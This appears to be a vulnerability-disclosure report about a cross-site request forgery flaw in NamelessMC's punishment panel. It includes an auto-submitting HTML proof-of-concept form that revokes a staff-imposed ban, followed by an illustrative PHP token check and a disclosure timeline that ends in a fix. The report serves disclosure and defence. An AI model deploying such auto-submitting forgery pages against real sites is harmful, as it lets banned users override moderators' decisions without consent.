Cross-Site Request Forgery (CSRF) in namelessmc/nameless

Valid

Reported on Sep 24th 2021


Description

With this CSRF, any user is able to remove any punishment that staff have placed on any user.

Proof of Concept

After you log in, open this POC.html in a browser. This will remove any punishment that's specified in the POC.

<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://example.com/panel/users/punishments/?user=2&do=revoke&id=1">
    <input type="submit" value="Submit request" />
</form>
<script>
  document.forms[0].submit();
</script>
</body>
</html>

This specific POC will remove the 1st punishment from the user with ID 2.

Impact

This vulnerability can allow banned users to regain access to the site.
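
The server-side check that rejects a request like the PoC above, shown as an added PHP example; it is not NamelessMC's code and not the content of the fix commit. The function names, the `token` form field and the session layout are assumptions made for illustration.

```php
<?php
declare(strict_types=1);

// Hypothetical helpers for illustration; not NamelessMC's API.

/** Create (once per session) and return the anti-CSRF token. */
function csrf_token(array &$session): string
{
    if (!isset($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}

/**
 * Decide whether a punishment revoke request may proceed.
 * Returns an HTTP status code: 200 = allowed, 405/403 = rejected.
 */
function authorize_revoke(string $method, array $post, array $session): int
{
    // A state change must not be reachable via GET: the browser attaches the
    // session cookie to a GET form submitted from any other site.
    if ($method !== 'POST') {
        return 405;
    }
    $expected  = $session['csrf_token'] ?? '';
    $submitted = $post['token'] ?? '';
    // hash_equals() compares in constant time; an empty token never matches.
    if (!is_string($submitted) || $expected === '' || !hash_equals($expected, $submitted)) {
        return 403;
    }
    return 200;
}

// Constructed sample requests (not captured traffic).
$session = ['user_id' => 1];   // logged-in staff session
$token   = csrf_token($session);

$cases = [
    'GET request, as sent by the PoC' => ['GET',  []],
    'POST without a token'            => ['POST', []],
    'POST with a wrong token'         => ['POST', ['token' => str_repeat('0', 64)]],
    'panel form with session token'   => ['POST', ['token' => $token]],
];
foreach ($cases as $label => [$method, $post]) {
    printf("%-32s -> %d\n", $label, authorize_revoke($method, $post, $session));
}
```

Only the last case returns 200: a page on another origin can make the browser send the request, but it cannot read the token bound to the staff member's session.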

We have contacted a member of the namelessmc/nameless team and are waiting to hear back a year ago
hexdubbers modified the report a year ago
Sam validated this vulnerability a year ago
hexdubbers has been awarded the disclosure bounty
The fix bounty is now up for grabs
Sam marked this as fixed with commit e24722 a year ago
The fix bounty has been dropped
This vulnerability will not receive a CVE